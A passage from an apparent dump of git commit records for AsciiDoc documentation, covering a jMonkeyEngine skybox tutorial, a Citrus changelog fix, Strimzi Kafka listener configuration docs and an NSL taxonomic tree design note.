view, press kbd:[Ctrl]+kbd:[NumPad 0] to set your selected camera to be the active camera.\u00a0\n- [ ] Press kbd:[F12] to render the scene. A image will appear in the left side UV\/Image Editor.\n- [ ] With your mouse inside the left side UV\/Image Editor you can scroll in or out to center the view.\n- [ ] With your mouse inside the left side UV\/Image Editor press kbd:[F3] to save your image. Rename the image (down.jpg in this case). \n\nFollow this same procedure for the remaining cameras. Rendering, renaming and saving each. After you have rendered all your images you can copy and paste them into your asset folder for JME3. Usually under the Texture directory. To use them in your code, in simpleInitApp(), load the Textures and use the SkyFactory to create your sky.\n\n[source,java]\n----\nTexture west = getAssetManager().loadTexture(\"Textures\/Sky\/west.jpg\");\nTexture east = getAssetManager().loadTexture(\"Textures\/Sky\/east.jpg\");\nTexture north = getAssetManager().loadTexture(\"Textures\/Sky\/north.jpg\");\nTexture south = getAssetManager().loadTexture(\"Textures\/Sky\/south.jpg\");\nTexture up = getAssetManager().loadTexture(\"Textures\/Sky\/up.jpg\");\nTexture down = getAssetManager().loadTexture(\"Textures\/Sky\/down.jpg\");\ngetRootNode().attachChild(SkyFactory.createSky(getAssetManager(), west, east, north, south, up, down));\n----\n\nListed below are other Blender tutorials JME3 users may find valuable. \n\n* link:https:\/\/www.katsbits.com\/tutorials\/blender\/cycles-skybox.php[Render a Skybox using Cycles]\n* link:https:\/\/www.katsbits.com\/tutorials\/blender\/render-skybox.php[Render a Skybox Environment Map]\n\nMany thanks go out to contributor glaucomardano for his video. He has excellent taste in music.\n\n\n== Gimp\n\n\nYou can use link:https:\/\/www.gimp.org\/[Gimp] to create SkyMaps from a single image with the addition of 2 scripts.\n\n* link:https:\/\/code.google.com\/archive\/p\/gimp-dds\/[Gimp-dds]\n* link:http:\/\/registry.gimp.org\/node\/25532[Cubemap Layers Generator]\n\nAfter installing the scripts you open a image in gimp. This script works by slicing up the image into 6 layers of equal size, each by the power of 2. \n\n. After you open the image you select `menu:Filters[Generic > Cubemap Layers Generator]`.\n. Fill in the details as follows. \n** Source: navigate to the image you are slicing.\n**\u00a0 Cubemap layout: `Cross Horizontal`\n** 2 to the power of: `10` (for 1024 sized Layers) \n. Press btn:[OK] to slice up the image.\n. Select `menu:File[Export As]` and change the `Name` and `File Type` to `.dds` and choose your save location to export into.\n. Press btn:[Export].\n* Compression: `None`\n* Format: `RGB8`\n* Save: `As cube map`\n* MipMaps: `No mipmaps`\n. Press btn:[OK] to export.\n\nYou add it to your scene as is explained in the <<jme3\/advanced\/sky#,How to add a Sky to your Scene>> tutorial.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"4365150b2ec846dfc71fde6de5ee554d8ce7c961","subject":"Update 2014-02-28-Write-once-run-No-write-as-often-as-possible.adoc","message":"Update 2014-02-28-Write-once-run-No-write-as-often-as-possible.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-02-28-Write-once-run-No-write-as-often-as-possible.adoc","new_file":"_posts\/2014-02-28-Write-once-run-No-write-as-often-as-possible.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"6ffdca3806cd72183e61cafe2e493f389cb54edf","subject":"Fixed broken link in the 2.5 changelog","message":"Fixed broken link in the 2.5 changelog\n","repos":"christophd\/citrus,christophd\/citrus","old_file":"src\/manual\/changes-2-5.adoc","new_file":"src\/manual\/changes-2-5.adoc","new_contents":"[[changes-2-5]]\n== Changes in Citrus 2.5\n\nWe have added lots of new features and improvements with Citrus 2.5. Namely these are the new modules for RMI and JMX support, a new x-www-form-urlencoded message validator and new functions anc test actions. Just have a look at the following features that made it to the box.\n\n[[changes-hamcrest-matcher]]\n=== Hamcrest matcher support\n\nHamcrest is a very powerful matcher library that provides a fantastic set of matcher implementations for message validation purpose. Citrus now supports these matchers coming from Hamcrest library. On the one hand you can use Hamcrest matchers as a Citrus validation matcher as described in link:validation-matcher-hamcrest[validation-matcher-hamcrest]. On the other hand you can use Hamcrest matchers now directly using the Citrus Java DSL. See details for this feature in link:json-path-validate[json-path-validate].\n\n[[changes-binary-base64-message-validator]]\n=== Binary base64 message validator\n\nThere is a new message validator implementation that automatically converts binary message content to a base64 encoded String representation for comparison. This is the easiest way to compare binary message content with an expected message payload. See link:#binary-message-validation[binary-message-validation] how this is working for you.\n\n[[changes-rmi]]\n=== RMI support\n\nRemote method invocation is a standard Java technology and API for calling methods on remote objects across different JVM instances. Although RMI has lost its popularity it is still used in legacy components. Testing RMI bean invocation is a hard thing to do. Now Citrus provides client and server support for remote interface invocation. See link:rmi[rmi] for details.\n\n[[changes-jmx]]\n=== JMX support\n\nSimilar to RMI JMX can be used to connect to remote bean invocation. This time we expose some beans to a managed bean server in order to be managed by JMX operations for read and write. With Citrus 2.5 we have added a client and server support for calling and providing managed beans on a mbean server. See link:jmx[jmx] for details.\n\n[[changes-resource-injection]]\n=== Resource injection\n\nWith 2.5 we have added mechanisms for injecting Citrus components to your Java DSL test methods. This is very useful when needing access to the Citrus test context for instance. Also we are able to use new injection of test designer and runner instances in order to support parallel test execution with multiple threads. See the explanations in link:testcase-resource-injection[testcase-resource-injection]and link:testcase-context-injection[testcase-context-injection].\n\n[[changes-http-x-www-form-urlencoded-message-validator]]\n=== Http x-www-form-urlencoded message validator\n\nHTML form data can be transmitted with different methods and content types. One of the most common ways is to use *x-www-form-urlencoded* form data content. As validation can be tricky we have added a special message validator for that. See link:http-www-form-urlencoded[http-www-form-urlencoded]for details.\n\n[[changes-date-range-validation-matcher]]\n=== Date range validation matcher\n\nAdded a new validation matcher implementation that is able to check that a date value is between a certain date range (from and to) The date range is able to focus on days as well as additional time (hour, minute, second) specifications. See link:validation-matcher-daterange[validation-matcher-daterange]for details.\n\n[[changes-read-file-resource-function]]\n=== Read file resource function\n\nA new function implementation offers you the possibilities to read file resource contents as inline data. The function is called and returns the file content as return value. The file content is then placed right where the function was called e.g. inside of a message payload element or as message header value. See link:functions-read-file[functions-read-file]for details.\n\n[[changes-timer-container]]\n=== Timer container\n\nThe new timer test action container repeats its execution based on a time expression (e.g. every 5 seconds). With this timer we can repeat test actions with a fixed time delay or constantly execute test actions with time schedule. See link:containers-timer[containers-timer]and link:actions-stop-timer[actions-stop-timer]for details.\n\n[[changes-upgrade-to-vertx-3-2-0]]\n=== Upgrade to Vert.x 3.2.0\n\nThe Vert.x module was upgraded to use Vert.x 3.2.0 version. The Citrus module implementation was updated to work with this new Vert.x version. Learn more about the Vert.x integration in Citrus with link:vertx[vertx].","old_contents":"[[changes-2-5]]\n== Changes in Citrus 2.5\n\nWe have added lots of new features and improvements with Citrus 2.5. Namely these are the new modules for RMI and JMX support, a new x-www-form-urlencoded message validator and new functions anc test actions. Just have a look at the following features that made it to the box.\n\n[[changes-hamcrest-matcher]]\n=== Hamcrest matcher support\n\nHamcrest is a very powerful matcher library that provides a fantastic set of matcher implementations for message validation purpose. Citrus now supports these matchers coming from Hamcrest library. On the one hand you can use Hamcrest matchers as a Citrus validation matcher as described in link:validation-matcher-hamcrest[validation-matcher-hamcrest]. On the other hand you can use Hamcrest matchers now directly using the Citrus Java DSL. See details for this feature in link:json-path-validate[json-path-validate].\n\n[[changes-binary-base64-message-validator]]\n=== Binary base64 message validator\n\nThere is a new message validator implementation that automatically converts binary message content to a base64 encoded String representation for comparison. This is the easiest way to compare binary message content with an expected message payload. See link:validation-binary[validation-binary]how this is working for you.\n\n[[changes-rmi]]\n=== RMI support\n\nRemote method invocation is a standard Java technology and API for calling methods on remote objects across different JVM instances. Although RMI has lost its popularity it is still used in legacy components. Testing RMI bean invocation is a hard thing to do. Now Citrus provides client and server support for remote interface invocation. See link:rmi[rmi] for details.\n\n[[changes-jmx]]\n=== JMX support\n\nSimilar to RMI JMX can be used to connect to remote bean invocation. This time we expose some beans to a managed bean server in order to be managed by JMX operations for read and write. With Citrus 2.5 we have added a client and server support for calling and providing managed beans on a mbean server. See link:jmx[jmx] for details.\n\n[[changes-resource-injection]]\n=== Resource injection\n\nWith 2.5 we have added mechanisms for injecting Citrus components to your Java DSL test methods. This is very useful when needing access to the Citrus test context for instance. Also we are able to use new injection of test designer and runner instances in order to support parallel test execution with multiple threads. See the explanations in link:testcase-resource-injection[testcase-resource-injection]and link:testcase-context-injection[testcase-context-injection].\n\n[[changes-http-x-www-form-urlencoded-message-validator]]\n=== Http x-www-form-urlencoded message validator\n\nHTML form data can be transmitted with different methods and content types. One of the most common ways is to use *x-www-form-urlencoded* form data content. As validation can be tricky we have added a special message validator for that. See link:http-www-form-urlencoded[http-www-form-urlencoded]for details.\n\n[[changes-date-range-validation-matcher]]\n=== Date range validation matcher\n\nAdded a new validation matcher implementation that is able to check that a date value is between a certain date range (from and to) The date range is able to focus on days as well as additional time (hour, minute, second) specifications. See link:validation-matcher-daterange[validation-matcher-daterange]for details.\n\n[[changes-read-file-resource-function]]\n=== Read file resource function\n\nA new function implementation offers you the possibilities to read file resource contents as inline data. The function is called and returns the file content as return value. The file content is then placed right where the function was called e.g. inside of a message payload element or as message header value. See link:functions-read-file[functions-read-file]for details.\n\n[[changes-timer-container]]\n=== Timer container\n\nThe new timer test action container repeats its execution based on a time expression (e.g. every 5 seconds). With this timer we can repeat test actions with a fixed time delay or constantly execute test actions with time schedule. See link:containers-timer[containers-timer]and link:actions-stop-timer[actions-stop-timer]for details.\n\n[[changes-upgrade-to-vertx-3-2-0]]\n=== Upgrade to Vert.x 3.2.0\n\nThe Vert.x module was upgraded to use Vert.x 3.2.0 version. The Citrus module implementation was updated to work with this new Vert.x version. Learn more about the Vert.x integration in Citrus with link:vertx[vertx].","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77faa6e4acee03d21b20e07b5fee6da505c30e61","subject":"Fix alternative names example in documentation (#3863)","message":"Fix alternative names example in documentation (#3863)\n\nSigned-off-by: Jakub Scholz <c50267b906a652f2142cfab006e215c9f6fdc8a0@scholzj.com>","repos":"ppatierno\/kaas,scholzj\/barnabas,scholzj\/barnabas,ppatierno\/kaas","old_file":"documentation\/api\/io.strimzi.api.kafka.model.listener.arraylistener.GenericKafkaListenerConfigurationBootstrap.adoc","new_file":"documentation\/api\/io.strimzi.api.kafka.model.listener.arraylistener.GenericKafkaListenerConfigurationBootstrap.adoc","new_contents":"Configures bootstrap service overrides for external listeners.\n\nBroker service equivalents of `nodePort`, `host`, `loadBalancerIP` and `annotations` properties are configured in the xref:type-GenericKafkaListenerConfigurationBroker-reference[`GenericKafkaListenerConfigurationBroker` schema].\n\n[id='property-listener-config-altnames-{context}']\n=== `alternativeNames`\n\nYou can specify alternative names for the bootstrap service.\nThe names are added to the broker certificates and can be used for TLS hostname verification.\nThe `alternativeNames` property is applicable to all types of external listeners.\n\n.Example of an external `route` listener configured with an additional bootstrap address\n[source,yaml,subs=\"attributes+\"]\n----\nlisteners:\n #...\n - name: external\n port: 9094\n type: route\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n alternativeNames:\n - example.hostname1\n - example.hostname2\n# ...\n----\n\n[id='property-listener-config-host-{context}']\n=== `host`\n\nThe `host` property is used with `route` and `ingress` listeners to specify the hostnames used by the bootstrap and per-broker services.\n\nA `host` property value is mandatory for `ingress` listener configuration, as the Ingress controller does not assign any hostnames automatically.\nMake sure that the hostnames resolve to the Ingress endpoints.\nStrimzi will not perform any validation that the requested hosts are available and properly routed to the Ingress endpoints.\n\n.Example of host configuration for an ingress listener\n[source,yaml,subs=\"attributes+\"]\n----\nlisteners:\n #...\n - name: external\n port: 9094\n type: ingress\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n host: bootstrap.myingress.com\n brokers:\n - broker: 0\n host: broker-0.myingress.com\n - broker: 1\n host: broker-1.myingress.com\n - broker: 2\n host: broker-2.myingress.com\n# ...\n----\n\nBy default, `route` listener hosts are automatically assigned by OpenShift.\nHowever, you can override the assigned route hosts by specifying hosts.\n\nStrimzi does not perform any validation that the requested hosts are available.\nYou must ensure that they are free and can be used.\n\n.Example of host configuration for a route listener\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: route\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n host: bootstrap.myrouter.com\n brokers:\n - broker: 0\n host: broker-0.myrouter.com\n - broker: 1\n host: broker-1.myrouter.com\n - broker: 2\n host: broker-2.myrouter.com\n# ...\n----\n\n[id='property-listener-config-nodeport-{context}']\n=== `nodePort`\n\nBy default, the port numbers used for the bootstrap and broker services are automatically assigned by Kubernetes.\nYou can override the assigned node ports for `nodeport` listeners by specifying the requested port numbers.\n\nStrimzi does not perform any validation on the requested ports.\nYou must ensure that they are free and available for use.\n\n.Example of an external listener configured with overrides for node ports\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: nodeport\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n nodePort: 32100\n brokers:\n - broker: 0\n nodePort: 32000\n - broker: 1\n nodePort: 32001\n - broker: 2\n nodePort: 32002\n# ...\n----\n\n[id='property-listener-config-lb-ip-{context}']\n=== `loadBalancerIP`\n\nUse the `loadBalancerIP` property to request a specific IP address when creating a loadbalancer.\nUse this property when you need to use a loadbalancer with a specific IP address.\nThe `loadBalancerIP` field is ignored if the cloud provider does not support the feature.\n\n.Example of an external listener of type `loadbalancer` with specific loadbalancer IP address requests\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: loadbalancer\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n loadBalancerIP: 172.29.3.10\n brokers:\n - broker: 0\n loadBalancerIP: 172.29.3.1\n - broker: 1\n loadBalancerIP: 172.29.3.2\n - broker: 2\n loadBalancerIP: 172.29.3.3\n# ...\n----\n\n[id='property-listener-config-annotations-{context}']\n=== `annotations`\n\nUse the `annotations` property to add annotations to `loadbalancer`, `nodeport` or `ingress` listeners.\nYou can use these annotations to instrument DNS tooling such as {KubernetesExternalDNS}, which automatically assigns DNS names to the loadbalancer services.\n\n.Example of an external listener of type `loadbalancer` using `annotations`\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: loadbalancer\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-bootstrap.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n brokers:\n - broker: 0\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-0.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n - broker: 1\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-1.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n - broker: 2\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-2.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n# ...\n----\n","old_contents":"Configures bootstrap service overrides for external listeners.\n\nBroker service equivalents of `nodePort`, `host`, `loadBalancerIP` and `annotations` properties are configured in the xref:type-GenericKafkaListenerConfigurationBroker-reference[`GenericKafkaListenerConfigurationBroker` schema].\n\n[id='property-listener-config-altnames-{context}']\n=== `alternativeNames`\n\nYou can specify alternative names for the bootstrap service.\nThe names are added to the broker certificates and can be used for TLS hostname verification.\nThe `alternativeNames` property is applicable to all types of external listeners.\n\n.Example of an external `route` listener configured with an additional bootstrap address\n[source,yaml,subs=\"attributes+\"]\n----\nlisteners:\n #...\n - name: external\n port: 9094\n type: route\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n alternativeNames: example.hostname\n# ...\n----\n\n[id='property-listener-config-host-{context}']\n=== `host`\n\nThe `host` property is used with `route` and `ingress` listeners to specify the hostnames used by the bootstrap and per-broker services.\n\nA `host` property value is mandatory for `ingress` listener configuration, as the Ingress controller does not assign any hostnames automatically.\nMake sure that the hostnames resolve to the Ingress endpoints.\nStrimzi will not perform any validation that the requested hosts are available and properly routed to the Ingress endpoints.\n\n.Example of host configuration for an ingress listener\n[source,yaml,subs=\"attributes+\"]\n----\nlisteners:\n #...\n - name: external\n port: 9094\n type: ingress\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n host: bootstrap.myingress.com\n brokers:\n - broker: 0\n host: broker-0.myingress.com\n - broker: 1\n host: broker-1.myingress.com\n - broker: 2\n host: broker-2.myingress.com\n# ...\n----\n\nBy default, `route` listener hosts are automatically assigned by OpenShift.\nHowever, you can override the assigned route hosts by specifying hosts.\n\nStrimzi does not perform any validation that the requested hosts are available.\nYou must ensure that they are free and can be used.\n\n.Example of host configuration for a route listener\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: route\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n host: bootstrap.myrouter.com\n brokers:\n - broker: 0\n host: broker-0.myrouter.com\n - broker: 1\n host: broker-1.myrouter.com\n - broker: 2\n host: broker-2.myrouter.com\n# ...\n----\n\n[id='property-listener-config-nodeport-{context}']\n=== `nodePort`\n\nBy default, the port numbers used for the bootstrap and broker services are automatically assigned by Kubernetes.\nYou can override the assigned node ports for `nodeport` listeners by specifying the requested port numbers.\n\nStrimzi does not perform any validation on the requested ports.\nYou must ensure that they are free and available for use.\n\n.Example of an external listener configured with overrides for node ports\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: nodeport\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n nodePort: 32100\n brokers:\n - broker: 0\n nodePort: 32000\n - broker: 1\n nodePort: 32001\n - broker: 2\n nodePort: 32002\n# ...\n----\n\n[id='property-listener-config-lb-ip-{context}']\n=== `loadBalancerIP`\n\nUse the `loadBalancerIP` property to request a specific IP address when creating a loadbalancer.\nUse this property when you need to use a loadbalancer with a specific IP address.\nThe `loadBalancerIP` field is ignored if the cloud provider does not support the feature.\n\n.Example of an external listener of type `loadbalancer` with specific loadbalancer IP address requests\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: loadbalancer\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n loadBalancerIP: 172.29.3.10\n brokers:\n - broker: 0\n loadBalancerIP: 172.29.3.1\n - broker: 1\n loadBalancerIP: 172.29.3.2\n - broker: 2\n loadBalancerIP: 172.29.3.3\n# ...\n----\n\n[id='property-listener-config-annotations-{context}']\n=== `annotations`\n\nUse the `annotations` property to add annotations to `loadbalancer`, `nodeport` or `ingress` listeners.\nYou can use these annotations to instrument DNS tooling such as {KubernetesExternalDNS}, which automatically assigns DNS names to the loadbalancer services.\n\n.Example of an external listener of type `loadbalancer` using `annotations`\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: loadbalancer\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-bootstrap.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n brokers:\n - broker: 0\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-0.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n - broker: 1\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-1.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n - broker: 2\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-2.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n# ...\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a051019b0fbb5ab62f01aa6f5284a059ab2c3096","subject":"Minor updates to the tree structure docs to indicate changes. TODO remove irrelevant stuff, this is versioned after all.","message":"Minor updates to the tree structure docs to indicate changes. TODO remove\nirrelevant stuff, this is versioned after all.\n","repos":"bio-org-au\/services,bio-org-au\/services,bio-org-au\/services","old_file":"docs\/NewTreeStructure.adoc","new_file":"docs\/NewTreeStructure.adoc","new_contents":"= New tree structure\nv1.0, June 2017\n:imagesdir: resources\/images\/\n:toc: left\n:toclevels: 4\n:toc-class: toc2\n:icons: font\n:iconfont-cdn: \/\/cdnjs.cloudflare.com\/ajax\/libs\/font-awesome\/4.3.0\/css\/font-awesome.min.css\n:stylesdir: resources\/style\/\n:stylesheet: asciidoctor.css\n:description: New tree structure documentation\n:keywords: documentation, NSL, APNI, API, APC, tree\n:links:\n:numbered:\n\nThe current tree structure is over complicated and difficult to validate and maintain going forward. The reasons for this\nare many, but basically come down to changing understanding of requirements.\n\nI propose to scale back and simplify the structure used to store the trees and to only implement what is currently required,\nthen evolve the implementation as needed.\n\nThe main change in requirements is the idea of using a workspace, or draft tree, to do work. The workspace would then be\npublished as a new version. once a version is published it is immutable _except_ for minor typographical changes as determined\nby policy.\n\n\nIMPORTANT: This work is designed to make the tree easy to understand and reason about, and therefore make it easier to\nchange and maintain over time, and improve performance.\n\n== Requirements\n\n=== Major requirements:\n\n . The tree must store and display the parent child taxonomic relationship between names.\n . The tree must be versioned so that a citation (id) of a tree element must reproduce the tree as it was when it was\n viewed.\n . A link to an element on the tree should be able to identify the version of the tree and reproduce that version.\n . You should be able to link to a _version_ of the tree and get the current tree easily.\n .. You should be able to compare taxa in different version via an identifier. The identifier is unique to the _circumscribed_\n or enclosed taxa below this taxa. This identifier spans multiple versions of a tree. See <<taxon identifiers>>\n . The tree must enforce strict rules about the placement of names on a tree.\n . Profile data including only Comment and Distribution data is to be stored in the tree structure.\n . Tree elements are pointers to an Instance as a representation of a Taxon Concept.\n . Tree elements can represent Accepted and Excluded items which need to be distinguished. This appears to be accepted\n and not accepted, but treated. The \"Excluded\" is a covering term of a number of reasons these names are not accepted\n (e.g. doubtful) but the distinction is not required. As such for now we can just indicate an element is Accepted or Not.\n . Easy to work with a version of the tree.\n . All common operations must be fast. You should be able to query the status of a name on the current tree without\n noticeable delay.\n . Editors should be able to work on a draft version of the tree without it being public, then publish it at a time of\n their choosing.\n . Versions should be released as a unit of work, collecting a set of changes together (policy).\n . The users need to be able to add a log entry describing the work done and referencing the documents that lead to the changes.\n . Multiple workspaces that can be merged over different time frames is a requirement.\n . It would be nice to be able to list and view older version of the tree and see what changed (diffing)\n . It would be nice to be able to archive older versions of the tree without breaking it.\n . we want to access the trees through RDF.\n\n==== Uber trees\n\n . we must be able to create an \"uber tree\" from multiple sub trees.\n . The uber tree should be able to merge sub trees from multiple points - for example lichens have multiple connections\n the the fungi tree.\n . Uber tree elements need to Link back to source tree nodes if compositional.\n\naccording to https:\/\/www.environment.gov.au\/science\/abrs\/publications\/other\/numbers-living-species\/executive-summary[ABRS Numbers of Living Species in Australia and the World]\nthere are ~2million species in the world that we should aim to handle in an uber tree.\n\n==== Use cases\n\n . creation of accepted taxonomic trees with strict hierarchical placement rules within a shard.\n . creation of a list of taxon concepts commonly (only) from family down, known as a checklist, from one or more shards.\n these trees may have more relaxed placement rules.\n . creation of composite (uber) trees made from multiple sub trees, such as accepted taxonomic trees from multiple shards\n\nWARNING: We should take a closer look at the needs of List compilers and Tree composers to see if the difference in the\n set or requirements leads to different solutions for each.\n\n==== Editors\n\nBased on the above use cases, and current editor usage, it looks like we need two different editing pathways for trees.\n\n . In instance editor tree editing: Where the advanced editor can create specific taxonomic concepts for accepted trees\n in accordance with some authority such as CHAH.\n . A composition editor that can compose multiple trees into an uber tree, or create a checklist. This doesn't require the\n ability to edit instances, just choose concepts, or other tree elements\/sections.\n\nPerhaps the second, compositional, editor is logically broken into an uber tree manager and a checklist editor.\n\n==== Search\n\nWe need to clearly define the difference between the search on names (the APNI search) and the search requirements on\ntrees. At the moment there is confusion because some searches in the advanced search are mix tree and name concerns.\n\nNOTE: Greg W. put this view forward too.\n\n===== use cases\n\n . search a tree for names under a name and bring back the results displaying the apni or apc format output\n * search synonyms or accepted only\n * search based on native, naturalised, distribution or profile data.\n * further advanced filtering based on name\/instance type, tags, author etc.\n . search a tree for names independent of any tree and display in APNI format - this may be an advanced search on name types\n tags, instance types, and may require knowledge of the Family.\n . Name check - a specific check against the accepted tree in a shard.\n . check to see if a taxon is the same as another taxon i.e. encloses the same sub taxa via comparison of a taxon identifier.\n\n===== implementation (discussion)\n\nTree searches should be associated with the tree they are on because a tree may be separated from the name and instance\ndata it is pointing at. In the case of the uber trees they may be pointing to multiple shards.\n\nSince trees contain the name and instance id, but not instance data a tree search may bring back a list of names that can\nin turn fetch APNI or APC format data via the existing service API (much like the existing service search).\n\nIf we want to implement a closer coupled database implementation in the search we could link to multiple shard databases\nto get the data. *I prefer the previous solution as it allows fully autonomous trees and lists to exist that just use\nlinked data.* However speed will need to be taken into account when looking at this, which means looking at if the service\nAPIs need improving or the solution is limited to direct database connections.\n\nWe need to carefully consider what is offered in search and how you discover what can be searched... initially of course\nwe are publicly offering only the APC as a cross shard search, and then moving up to NSL including AFD.\n\nTrees that are linked to a shard, e.g. the Vascular APC tree, that have a database relationship to the name and instance\ndata in the shard can take advantage of joins for more complex queries.\n\nCross shard searching in general needs an API approach where an API (which could be just a database connection) is used\nto collect data, then a map\/reduce\/sort approach is used to filter and sort results. The name paths and sort names will\nhelp in collating and sorting results from multiple sources.\n\nSee https:\/\/www.anbg.gov.au\/25jira\/browse\/NSL-2412[NSL-2312]\n\nAfter discussion with Greg Whitbread and following from user feedback and experience the use of the name tree search may\nbe a reflection of the way we use the \"product\" concept and clarification of how the sets of data can be used, and what\nthey should be used for.\n\nAt the moment we try and describe this in the APNI and APC product descriptions.\n\nAPNI\n****\nThe Australian Plant Name Index (APNI) is a tool for the botanical community that deals with plant names and their usage\nin the scientific literature, whether as a current name or synonym. APNI does not recommend any particular taxonomy or\nnomenclature. For a listing of currently accepted scientific names for the Australian vascular flora, please use the\nAustralian Plant Census (APC) link above.\n****\n\nAPC\n****\nThe Australian Plant Census (APC) is a list of the accepted scientific names for the Australian vascular flora, ferns,\ngymnosperms, hornworts and liverworts, both native and introduced, and includes synonyms and misapplications for these\nnames. The APC covers all published scientific plant names used in an Australian context in the taxonomic literature,\nbut excludes taxa known only from cultivation in Australia. The taxonomy and nomenclature adopted for the APC are endorsed\nby the Council of Heads of Australasian Herbaria (CHAH).\n****\n\nAs Greg points out though, we don't limit the search, because people are asking \"within\" questions from APNI. This\nquestion comes about because scientific names intrinsically, but unreliably, describe or imply rank and hierarchy\ninformation, except where they don't.\n\nIt seems to me that we need to explicitly combine the name and taxonomy searches and express clearly what it is the\nuser is asking: for example \"what is in the family Fabaceae according to Maberly\" or \"what is in the family Fabaceae\naccording to APC\" and then we can do useful things like \"compare the family Fabaceae according to Maberly and APC\"\n\nBy combining we can ask questions like \"What is not in APC but is in Maberly\" so long as we can emphasize the context\nof the APNI\/NSL dataset.\n\n=== Change over requirements:\n\n . We must maintain existing links to trees (APC) that have been used prior to this change. This means any links to\n existing nodes must resolve to the same instance data and position in the tree structure. The intrinsic data should not\n change, though extraneous data may be left out (broken links, some RDF identifiers that didn't lead to real data).\n . Editing the tree should work and be possible from the point of change over.\n\n== Concept\n\nThe concept for the new structure is to remove the need for link objects and simply copy the list of tree elements for\neach version of the tree. The Workspace is then a copy of the current tree that is then altered. When the workspace is\nready it is published as the latest version of the tree by making it the current version. A copy of the current version\nis then made to create the new workspace version.\n\nWe track changes in the tree by maintaining a previous link that points to the tree_element in the previous version.\n\nVersions are grouped by a tree_version which is associated with a tree. Tree_elements are associated with a tree_version\nvia a linking tree_version_element table.\n\n Tree <- [Tree_Versions]<-[Tree_Version_Elements]<- [Tree_Elements]\n\nThe tree holds a pointer to the current tree and a default workspace. Tree_version_element is a join table between tree\nversions and tree elements, and is the versioned object or tree_element. This structure reduces duplication of data on\ncopying a tree, and holds a unique versioned identifier for an element in a tree.\n\nThis concept is storage efficient and simple. Excessive numbers of versions could create a lot of copied\ntree version elements, but the workspace\/publish model may also lead to a more structured release of versions\n(e.g. once a Day\/Week\/Month) instead of on the fly changes.\n\n=== User concept\n\nVersions of a tree are Publications that can be referenced or cited. You can cite a published tree (version) using an\nidentifier for the _tree_version_ or using an identifier for a _tree_version_element_. This will return the element and\nthen entire tree in the context of the published tree.\n\n==== taxon identifiers\n\nEach tree_version_element also has associated a _taxon identifier_ which identifies the concept of the taxon in terms of\nthe data including the circumscription of the taxon (i.e. the taxa under this taxon). The taxon identifier can be used to\ncompare taxon between versions, i.e. see if the concept has changed.\n\nThe definition of a taxon for determining if it has changed is:\n\n* A taxon consists of the Name, it's Instance and it's children. Where an Instance defines the usage of the Name in a\nreference and it's Synonymy.\n* A taxon does *not* include the status (Excluded from this classification) or the Profile data (Comments and Distribution)\nwhich are part of the classification as published.\n\nA taxon will exist in many publications (versions) of a tree, so the distribution, comments and status may change over\nthe publications.\n\nNOTE: See <<Existing links, Existing links >> for resolving taxon identifiers\n\n=== Autonomous trees\n\nTrees should be able to be autonomous from the shards. This means that database foreign keys to names and instances are\nnot enforced (i.e. no direct FK relationship). This means we need to rely on the link to identify the instances. It also\nmeans that we want to copy the data required to ask questions of the tree into the tree structure as much as possible.\n\nWhilst we will rely on the link to reference the data in the shards we will store the instance and name id (as a Long),\nwhich means also that we need to store the source shard for the instance and name. If a placed name later becomes\nde-duplicated we may have to update the id by using the mapper (rare).\n\n=== Data usage vs speed\n\nCopying the tree for every version is less space efficient than the current model, but affords many benefits. At the\ncurrent size of the APC tree 35k tree_elements are required for each copy.\n\nNOTE: these are updated usage figures after spiking and importing actual data, the old guesstimate has been 